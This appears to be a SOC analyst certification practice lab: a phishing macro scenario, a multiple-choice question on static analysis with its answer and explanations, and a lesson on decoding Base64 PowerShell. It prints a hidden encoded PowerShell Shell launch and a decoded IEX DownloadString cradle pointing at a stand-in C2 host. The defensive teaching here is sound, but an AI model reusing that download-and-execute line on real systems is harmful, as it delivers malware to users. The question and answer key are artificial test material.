CSA (312-39) SOC Simulation Lab

Learn how to safely inspect malicious documents and extract obfuscated PowerShell scripts without detonating the payload in your environment.

Scenario Context

You are a Tier 3 SOC Analyst investigating a phishing campaign. A user in the HR department (hr-wks-044) reported a suspicious email attachment named Q3_Bonus_Adjustments.docm. The local EDR flagged the file upon download but did not quarantine it due to a misconfigured policy path.

You have acquired the file and placed it in your isolated REMnux analysis VM. You need to identify the exact Command and Control (C2) domains the script is attempting to contact, but the malware is known to be sandbox-evasive (it will not execute if it detects a virtualized environment).

Security Environment

Instead of double-clicking the file, you use the Python tool oledump.py to inspect the OLE streams within the document structure.

remnux@soc-lab:~$ oledump.py Q3_Bonus_Adjustments.docm

1: 114 '\x01CompObj'

2: 4096 '\x05DocumentSummaryInformation'

3: 4096 '\x05SummaryInformation'

4: 7041 '1Table'

5: 441 'Macros/PROJECT'

6: 65 'Macros/PROJECTwm'

7: M 2304 'Macros/VBA/ThisDocument'


remnux@soc-lab:~$ oledump.py -s 7 -v Q3_Bonus_Adjustments.docm | grep -i shell

Shell("powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -enc JABzAD0ATgBlAHcALQBPAGIAagBl...")

You successfully extract the Base64 encoded PowerShell string. You now need to decode it to read the logic.

Question

The SOC team found a suspicious document file on a user's workstation. Upon initial inspection, the document appears benign, but deeper analysis reveals an embedded PowerShell script. The team suspects the script is designed to download and execute a malicious payload. They need to understand the script's functionality without triggering it. Which malware analysis technique would be recommended technique for the SOC team to understand the PowerShell script's functionality without executing it?
A. Static analysis
B. Network traffic analysis
C. Dynamic analysis
D. Automated behavioral analysis
SOC Hint: The key constraint in the scenario is "without triggering it". Which analysis method relies entirely on reverse engineering, code inspection, and decoding files at rest?

Expert Insight

1. What is happening?

The adversary is utilizing a weaponized Microsoft Office document (MITRE ATT&CK T1566.001) containing malicious VBA macros. Once a user enables content, the macro uses the Shell command to spawn a Living-off-the-Land (LotL) attack via PowerShell. To evade basic signature detection, the PowerShell payload is Base64 encoded (-enc).

2. Why A is correct

Static analysis is the process of examining malware without running it. By using tools like oledump.py, strings, or CyberChef to extract and decode the Base64 script, the SOC analyst can read the exact URLs, C2 IP addresses, and file paths the script intends to use. This satisfies the requirement to understand functionality without detonating the payload and risking infection.

3. Why the others are wrong

  • B. Network traffic analysis: Requires the malware to be executed so it can generate the network traffic (beaconing or downloading) you intend to capture via PCAP.
  • C. Dynamic analysis: The literal opposite of what is requested. Dynamic analysis requires detonating the malware in a controlled environment (sandbox) to observe its behavior (process creation, registry changes).
  • D. Automated behavioral analysis: This is a form of dynamic analysis (like submitting to Any.Run, Cuckoo, or Joe Sandbox). It executes the file to trace its API calls and behavior.

4. Real-world SOC Application

While dynamic analysis (sandboxing) is fast, modern malware often contains "anti-analysis" or "anti-VM" checks. For example, a script might check if the system domain is WORKGROUP or if the CPU core count is less than 4. If these checks fail, the malware simply exits, and your dynamic analysis yields zero C2 Indicators of Compromise (IOCs). By manually performing static analysis, a senior analyst bypasses these evasion techniques to extract the hardcoded IOCs directly from the script.

MINI LESSON: Decoding Base64 PowerShell Statically

When you encounter a powershell -enc payload, the string is Base64 encoded Unicode (UTF-16LE), not standard ASCII. You can easily decode this statically without running the malicious code using native PowerShell safely or CyberChef.

# Safe static decoding using PowerShell (does not execute the malicious payload)

PS C:\> $b64 = "SgBBAEIAcwBBAEQAMABBAFQAZwBCAEwAYwBBAEwALQBBAE8AQQBCAEkAQQBiAGcAZQ..."

PS C:\> [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($b64))


# Output reveals the hidden C2 logic:

$s=New-Object IO.MemoryStream(...); IEX (New-Object Net.WebClient).DownloadString('http://evil-c2.com/payload.ps1')

Pro-Tip for ExamRange users: Always map decoded scripts back to MITRE ATT&CK. The IEX (Invoke-Expression) combined with DownloadString is a classic indicator of T1059.001 (Command and Scripting Interpreter: PowerShell).

Ready for the next incident?

Enhance your malware analysis and incident response skills.

Explore more CSA simulations